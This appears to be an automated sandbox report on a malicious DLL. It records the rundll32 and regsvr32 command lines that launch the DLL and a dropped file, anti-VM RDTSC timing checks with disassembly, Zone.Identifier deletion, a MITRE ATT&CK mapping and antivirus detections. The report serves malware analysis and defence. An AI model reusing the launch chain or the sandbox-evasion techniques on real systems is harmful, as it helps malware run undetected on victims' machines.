Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0301AAF35_2_0301AAF3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030068F25_2_030068F2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030156F85_2_030156F8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6F214EB0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6F214EB0 appears 46 times
Source: mATFWhYtPk.dllBinary or memory string: OriginalFilenameZqutyyvlsw.dll6 vs mATFWhYtPk.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: mATFWhYtPk.dllVirustotal: Detection: 25%
Source: mATFWhYtPk.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mATFWhYtPk.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,DllRegisterServer
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5868 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,asbiqstaeqzsycc
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,atwuhkycfybkj
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uexmfpkplvbbrf\jerrpf.tlt",SfMITlqpKAP
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServer
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mATFWhYtPk.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,DllRegisterServerJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,asbiqstaeqzsyccJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\mATFWhYtPk.dll,atwuhkycfybkjJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServerJump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5868 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uexmfpkplvbbrf\jerrpf.tlt",SfMITlqpKAPJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",DllRegisterServerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F0A62C4E-5414-11EC-90E5-ECF4BB2D2496}.datJump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF4AB291A385B95D5D.TMPJump to behavior
Source: classification engineClassification label: mal56.evad.winDLL@30/114@6/2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F20AEB0 CoCreateInstance,OleRun,2_2_6F20AEB0
Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F20DC50 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,2_2_6F20DC50
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: mATFWhYtPk.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: mATFWhYtPk.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: mATFWhYtPk.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: mATFWhYtPk.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: mATFWhYtPk.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: mATFWhYtPk.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F214F00 push ecx; ret 2_2_6F214F13
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F236451 push ecx; ret 2_2_6F236464
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F214F00 push ecx; ret 3_2_6F214F13
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F236451 push ecx; ret 3_2_6F236464
Source: mATFWhYtPk.dllStatic PE information: real checksum: 0x72da1 should be: 0x76fac
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\mATFWhYtPk.dll
Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Uexmfpkplvbbrf\jerrpf.tltJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Uexmfpkplvbbrf\jerrpf.tlt:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006F206570 second address: 000000006F2065AB instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000F8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007F7710B8F397h 0x0000000e mov dword ptr [esp+14h], 0B8FEA98h 0x00000016 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000006F207835 second address: 000000006F207863 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F7710CF3C41h 0x0000000a mov ebx, 05F1FEE1h 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\regsvr32.exeRDTSC instruction interceptor: First address: 000000006F206570 second address: 000000006F2065AB instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000F8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007F7710B8F397h 0x0000000e mov dword ptr [esp+14h], 0B8FEA98h 0x00000016 rdtscp
Source: C:\Windows\SysWOW64\regsvr32.exeRDTSC instruction interceptor: First address: 000000006F207835 second address: 000000006F207863 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F7710CF3C41h 0x0000000a mov ebx, 05F1FEE1h 0x0000000f rdtscp
Source: C:\Windows\System32\loaddll32.exeRDTSC instruction interceptor: First address: 000000006F206570 second address: 000000006F2065AB instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000F8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007F7710B8F397h 0x0000000e mov dword ptr [esp+14h], 0B8FEA98h 0x00000016 rdtscp
Source: C:\Windows\System32\loaddll32.exeRDTSC instruction interceptor: First address: 000000006F207835 second address: 000000006F207863 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F7710CF3C41h 0x0000000a mov ebx, 05F1FEE1h 0x0000000f rdtscp
Source: C:\Windows\System32\svchost.exe TID: 6928Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F206530 rdtscp 2_2_6F206530
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F22B531 FindFirstFileExA,2_2_6F22B531
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F22B531 FindFirstFileExA,3_2_6F22B531
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: svchost.exe, 0000000C.00000002.911297448.0000020000062000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
Source: svchost.exe, 0000000C.00000002.896576932.000001FFFEA29000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.911279592.000002000004A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F214D87 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6F214D87
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F21736C GetProcessHeap,HeapFree,2_2_6F21736C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F206530 rdtscp 2_2_6F206530
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A6DB4C mov eax, dword ptr fs:[00000030h]0_2_00A6DB4C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F206530 mov eax, dword ptr fs:[00000030h]2_2_6F206530
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F206530 mov eax, dword ptr fs:[00000030h]2_2_6F206530
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F224E12 mov eax, dword ptr fs:[00000030h]2_2_6F224E12
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F22B306 mov eax, dword ptr fs:[00000030h]2_2_6F22B306
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F217254 mov esi, dword ptr fs:[00000030h]2_2_6F217254
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F2079C0 mov eax, dword ptr fs:[00000030h]2_2_6F2079C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02FCDB4C mov eax, dword ptr fs:[00000030h]3_2_02FCDB4C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F206530 mov eax, dword ptr fs:[00000030h]3_2_6F206530
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F206530 mov eax, dword ptr fs:[00000030h]3_2_6F206530
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F224E12 mov eax, dword ptr fs:[00000030h]3_2_6F224E12
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F22B306 mov eax, dword ptr fs:[00000030h]3_2_6F22B306
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F217254 mov esi, dword ptr fs:[00000030h]3_2_6F217254
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F2079C0 mov eax, dword ptr fs:[00000030h]3_2_6F2079C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0300DB4C mov eax, dword ptr fs:[00000030h]5_2_0300DB4C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F21453A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6F21453A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F214D87 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6F214D87
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F21D314 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6F21D314
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F21453A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F21453A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F214D87 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F214D87
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F21D314 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F21D314
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1Jump to behavior
Source: rundll32.exe, 00000010.00000002.894573044.0000000003750000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.887564266.0000000002A30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000010.00000002.894573044.0000000003750000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.887564266.0000000002A30000.00000002.00020000.sdmpBinary or memory string: Progman
Source: rundll32.exe, 00000010.00000002.894573044.0000000003750000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.887564266.0000000002A30000.00000002.00020000.sdmpBinary or memory string: &Program Manager
Source: rundll32.exe, 00000010.00000002.894573044.0000000003750000.00000002.00020000.sdmp, rundll32.exe, 00000012.00000002.887564266.0000000002A30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,2_2_6F233FE7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,2_2_6F22C608
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,2_2_6F233D09
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_6F233D97
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,2_2_6F233C23
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,2_2_6F233C6E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,2_2_6F233B7A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,2_2_6F234218
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_6F2342EB
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_6F234110
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_6F2339A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,2_2_6F22C0BA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F233FE7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F22C608
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F233D09
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6F233D97
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F233C23
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F233C6E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F233B7A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6F234218
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6F2342EB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6F234110
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6F2339A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6F22C0BA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F214BA6 cpuid 2_2_6F214BA6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6F214F17 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_6F214F17

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection12Masquerading21OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery141Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRegsvr321DCSyncSystem Information Discovery143Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 533067 Sample: mATFWhYtPk Startdate: 03/12/2021 Architecture: WINDOWS Score: 56 51 Multi AV Scanner detection for submitted file 2->51 8 loaddll32.exe 1 2->8         started        11 svchost.exe 2->11         started        process3 dnsIp4 55 Tries to detect virtualization through RDTSC time measurements 8->55 14 cmd.exe 1 8->14         started        16 rundll32.exe 2 8->16         started        19 regsvr32.exe 8->19         started        21 4 other processes 8->21 39 127.0.0.1 unknown unknown 11->39 signatures5 process6 signatures7 23 rundll32.exe 14->23         started        47 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->47 26 rundll32.exe 16->26         started        49 Tries to detect virtualization through RDTSC time measurements 19->49 28 rundll32.exe 19->28         started        30 iexplore.exe 139 21->30         started        33 rundll32.exe 21->33         started        35 rundll32.exe 21->35         started        process8 dnsIp9 53 Tries to detect virtualization through RDTSC time measurements 23->53 37 rundll32.exe 23->37         started        41 lg3.media.net 23.211.6.95, 443, 49786, 49787 AKAMAI-ASUS United States 30->41 43 www.msn.com 30->43 45 4 other IPs or domains 30->45 signatures10 process11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
mATFWhYtPk.dll26%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
7.2.rundll32.exe.2b20000.0.unpack100%AviraHEUR/AGEN.1110387Download File
5.2.rundll32.exe.3000000.0.unpack100%AviraHEUR/AGEN.1110387Download File
2.2.regsvr32.exe.2fb0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
7.2.rundll32.exe.2ba4300.1.unpack100%AviraHEUR/AGEN.1110387Download File
8.2.rundll32.exe.3140000.0.unpack100%AviraHEUR/AGEN.1110387Download File
0.2.loaddll32.exe.a60000.1.unpack100%AviraHEUR/AGEN.1110387Download File
3.2.rundll32.exe.2fc0000.0.unpack100%AviraHEUR/AGEN.1110387Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
https://www.botman.ninja/privacy-policy0%Avira URL Cloudsafe
https://www.queryclick.com/privacy-policy0%Avira URL Cloudsafe
https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
https://silvermob.com/privacy0%Avira URL Cloudsafe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
